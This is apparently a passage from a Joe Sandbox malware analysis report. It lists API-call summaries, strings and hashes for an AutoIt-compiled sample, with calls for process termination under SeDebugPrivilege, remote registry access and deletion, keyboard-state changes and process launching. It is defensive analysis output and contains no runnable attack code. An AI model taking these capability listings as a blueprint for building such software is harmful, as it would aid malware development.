                                                                                                                                                                              • GetLastError.KERNEL32(00000000), ref: 00511751
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00511786
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                              • String ID: SeDebugPrivilege
                                                                                                                                                                              • API String ID: 2533919879-2896544425
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadIconW.USER32(00000000,00007F03), ref: 004F62D6
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: IconLoad
                                                                                                                                                                              • String ID: blank$info$question$stop$warning
                                                                                                                                                                              • API String ID: 2457776203-404129466
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 004F7595
                                                                                                                                                                              • LoadStringW.USER32(00000000), ref: 004F759C
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004F75B2
                                                                                                                                                                              • LoadStringW.USER32(00000000), ref: 004F75B9
                                                                                                                                                                              • _wprintf.LIBCMT ref: 004F75DF
                                                                                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004F75FD
                                                                                                                                                                              Strings
                                                                                                                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 004F75DA
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                              • API String ID: 3648134473-3128320259
                                                                                                                                                                              • Opcode ID: 3e52a45db354d8dfdff6611faf4ac495ffec18a6797d7f229a23850c6d5f01dd
                                                                                                                                                                              • Instruction ID: e70adbbf75480f94710d1ff2b5b56ba6fe7f08df2b2eb43dc5a6bf15eff132bf
                                                                                                                                                                              • Opcode Fuzzy Hash: 3e52a45db354d8dfdff6611faf4ac495ffec18a6797d7f229a23850c6d5f01dd
                                                                                                                                                                              • Instruction Fuzzy Hash: 1D0136F2500208BFE711A794ED89EF7777CD704305F000496B745D2151EA789E889B75
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                                • Part of subcall function 00513AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00512AA6,?,?), ref: 00513B0E
                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00512AE7
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3479070676-0
                                                                                                                                                                              • Opcode ID: 33febbee618b901a45d19f8fb276d080f949bd3bbb9ae805739502d004df2457
                                                                                                                                                                              • Instruction ID: 4a1f7d5a9441ab59b68eea5d55a15ba9d706d2f4894b8ad173ccc6afb82463b7
                                                                                                                                                                              • Opcode Fuzzy Hash: 33febbee618b901a45d19f8fb276d080f949bd3bbb9ae805739502d004df2457
                                                                                                                                                                              • Instruction Fuzzy Hash: 10919B31204201AFDB00EF15C895BAEBBE5BF84318F04880EF586872A1DB74ED95DF96
                                                                                                                                                                              APIs
                                                                                                                                                                              • __mtinitlocknum.LIBCMT ref: 004DB744
                                                                                                                                                                                • Part of subcall function 004D8A0C: __FF_MSGBANNER.LIBCMT ref: 004D8A21
                                                                                                                                                                                • Part of subcall function 004D8A0C: __NMSG_WRITE.LIBCMT ref: 004D8A28
                                                                                                                                                                                • Part of subcall function 004D8A0C: __malloc_crt.LIBCMT ref: 004D8A48
                                                                                                                                                                              • __lock.LIBCMT ref: 004DB757
                                                                                                                                                                              • __lock.LIBCMT ref: 004DB7A3
                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00566948,00000018,004E6C2B,?,00000000,00000109), ref: 004DB7BF
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(8000000C,00566948,00000018,004E6C2B,?,00000000,00000109), ref: 004DB7DC
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(8000000C), ref: 004DB7EC
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1422805418-0
                                                                                                                                                                              • Opcode ID: e1c3741dcbf993de039b4a971c0e471abe769e6ae806e649c95c6541880db0c4
                                                                                                                                                                              • Instruction ID: 41dd022488ceffe05175b7e54df20c1849f86023545bcc0c741709fc003914b3
                                                                                                                                                                              • Opcode Fuzzy Hash: e1c3741dcbf993de039b4a971c0e471abe769e6ae806e649c95c6541880db0c4
                                                                                                                                                                              • Instruction Fuzzy Hash: 43413371E00205CBEB10AF69E864369B7B4EF01329F12821FF428AB3D1D77898459BD9
                                                                                                                                                                              APIs
                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 004FA1CE
                                                                                                                                                                                • Part of subcall function 004D010A: std::exception::exception.LIBCMT ref: 004D013E
                                                                                                                                                                                • Part of subcall function 004D010A: __CxxThrowException@8.LIBCMT ref: 004D0153
                                                                                                                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 004FA205
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 004FA221
                                                                                                                                                                              • _memmove.LIBCMT ref: 004FA26F
                                                                                                                                                                              • _memmove.LIBCMT ref: 004FA28C
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 004FA29B
                                                                                                                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004FA2B0
                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 004FA2CF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 256516436-0
                                                                                                                                                                              • Opcode ID: c5bdd45decf0babccadcaf9f835aaff867ab2901848f53e0d8ba970fdf62b864
                                                                                                                                                                              • Instruction ID: 543d731446a1a0d36cd4473124dc78a0309cba1f023c6026ab1687dbd3ba68dd
                                                                                                                                                                              • Opcode Fuzzy Hash: c5bdd45decf0babccadcaf9f835aaff867ab2901848f53e0d8ba970fdf62b864
                                                                                                                                                                              • Instruction Fuzzy Hash: 9F31CE31A00105EBCB00DF95DC85AAFBBB8EF44310F1040AAF904AB346C775D918DBA5
                                                                                                                                                                              APIs
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00518CF3
                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00518CFB
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00518D06
                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00518D12
                                                                                                                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00518D4E
                                                                                                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00518D5F
                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0051BB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00518D99
                                                                                                                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00518DB9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3864802216-0
                                                                                                                                                                              • Opcode ID: 8413626accba0e0329dffb5c8f68ccb2e6b40814420a69688708930a22fc81be
                                                                                                                                                                              • Instruction ID: ba1bc707c7fe2d0811eb37a07fdfcd6aa0839609be4e19580226d2b71cd5353d
                                                                                                                                                                              • Opcode Fuzzy Hash: 8413626accba0e0329dffb5c8f68ccb2e6b40814420a69688708930a22fc81be
                                                                                                                                                                              • Instruction Fuzzy Hash: 4D316B72200614BBEB208F50EC8AFEA3FB9EF59755F084055FE089A291DA759841DBB0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 5d6c13809a69d485a9264ca59fae67ba5c9f2f937ebcddb7d64337b968c9f3f1
                                                                                                                                                                              • Instruction ID: 5031b81a3c7c5d7f33048ffa29b9daaae25c2013eba8242a485797ad78a122fc
                                                                                                                                                                              • Opcode Fuzzy Hash: 5d6c13809a69d485a9264ca59fae67ba5c9f2f937ebcddb7d64337b968c9f3f1
                                                                                                                                                                              • Instruction Fuzzy Hash: 4B716D75904109FFCB08CF98DC89EAEBB78FF85318F14815EF915A6251C7349A12CBA8
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 0051214B
                                                                                                                                                                              • _memset.LIBCMT ref: 00512214
                                                                                                                                                                              • ShellExecuteExW.SHELL32(?), ref: 00512259
                                                                                                                                                                                • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                                                                                                                                                • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                                                                                                                                                • Part of subcall function 004B3BCF: _wcscpy.LIBCMT ref: 004B3BF2
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00512320
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0051232F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                                                                              • String ID: @
                                                                                                                                                                              • API String ID: 4082843840-2766056989
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetParent.USER32(?), ref: 004F481D
                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 004F4832
                                                                                                                                                                              • SetKeyboardState.USER32(?), ref: 004F4893
                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 004F48C1
                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 004F48E0
                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 004F4926
                                                                                                                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004F4949
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 87235514-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetParent.USER32(00000000), ref: 004F4638
                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 004F464D
                                                                                                                                                                              • SetKeyboardState.USER32(?), ref: 004F46AE
                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 004F46DA
                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 004F46F7
                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 004F473B
                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 004F475C
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 87235514-0
                                                                                                                                                                              APIs
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcsncpy$LocalTime
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2945705084-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00513C92
                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00513CBC
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00513D71
                                                                                                                                                                                • Part of subcall function 00513C63: RegCloseKey.ADVAPI32(?), ref: 00513CD9
                                                                                                                                                                                • Part of subcall function 00513C63: FreeLibrary.KERNEL32(?), ref: 00513D2B
                                                                                                                                                                                • Part of subcall function 00513C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00513D4E
                                                                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00513D16
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 395352322-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00518DF4
                                                                                                                                                                              • GetWindowLongW.USER32(00F1E108,000000F0), ref: 00518E27
                                                                                                                                                                              • GetWindowLongW.USER32(00F1E108,000000F0), ref: 00518E5C
                                                                                                                                                                              • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00518E8E
                                                                                                                                                                              • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00518EB8
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00518EC9
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00518EE3
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LongWindow$MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2178440468-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004F1734
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004F175A
                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 004F175D
                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 004F177B
                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 004F1784
                                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 004F17A9
                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 004F17B7
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3761583154-0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 004B31DA
                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 004F6A2B
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004F6A49
                                                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 004F6A62
                                                                                                                                                                                • Part of subcall function 004F6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 004F6DBA
                                                                                                                                                                                • Part of subcall function 004F6D6D: GetLastError.KERNEL32 ref: 004F6DC5
                                                                                                                                                                                • Part of subcall function 004F6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 004F6DD9
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004F6AA4
                                                                                                                                                                              • SHFileOperationW.SHELL32(?), ref: 004F6B0C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                              • API String ID: 2323102230-1173974218
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __wcsnicmp
                                                                                                                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                                              • API String ID: 1038674560-2734436370
                                                                                                                                                                              APIs
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004F180D
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004F1833
                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 004F1836
                                                                                                                                                                              • SysAllocString.OLEAUT32 ref: 004F1857
                                                                                                                                                                              • SysFreeString.OLEAUT32 ref: 004F1860
                                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 004F187A
                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 004F1888
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3761583154-0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004CC657
                                                                                                                                                                                • Part of subcall function 004CC619: GetStockObject.GDI32(00000011), ref: 004CC66B
                                                                                                                                                                                • Part of subcall function 004CC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 004CC675
                                                                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0051A13B
                                                                                                                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0051A148
                                                                                                                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0051A153
                                                                                                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0051A162
                                                                                                                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0051A16E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                              • String ID: Msctls_Progress32
                                                                                                                                                                              • API String ID: 1025951953-3636473452
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 0051E14D
                                                                                                                                                                              • _memset.LIBCMT ref: 0051E15C
                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00573EE0,00573F24), ref: 0051E18B
                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 0051E19D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                                                              • String ID: $?W$>W
                                                                                                                                                                              • API String ID: 3277943733-2305796706
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004CC6C0
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004CC701
                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 004CC729
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004CC856
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004CC86F
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Rect$Client$Window$Screen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1296646539-0
                                                                                                                                                                              APIs
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove$__itow__swprintf
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3253778849-0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                                • Part of subcall function 00513AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00512AA6,?,?), ref: 00513B0E
                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00512FA0
                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00512FE0
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00513003
                                                                                                                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0051302C
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0051306F
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0051307C
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4046560759-0
                                                                                                                                                                              APIs
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcscpy$_wcscat
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2037614760-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004F2AF6
                                                                                                                                                                              • VariantClear.OLEAUT32(00000013), ref: 004F2B68
                                                                                                                                                                              • VariantClear.OLEAUT32(00000000), ref: 004F2BC3
                                                                                                                                                                              • _memmove.LIBCMT ref: 004F2BED
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004F2C3A
                                                                                                                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 004F2C68
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1101466143-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetMenu.USER32(?), ref: 0051833D
                                                                                                                                                                              • GetMenuItemCount.USER32(00000000), ref: 00518374
                                                                                                                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0051839C
                                                                                                                                                                              • GetMenuItemID.USER32(?,?), ref: 0051840B
                                                                                                                                                                              • GetSubMenu.USER32(?,?), ref: 00518419
                                                                                                                                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0051846A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Menu$Item$CountMessagePostString
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 650687236-0
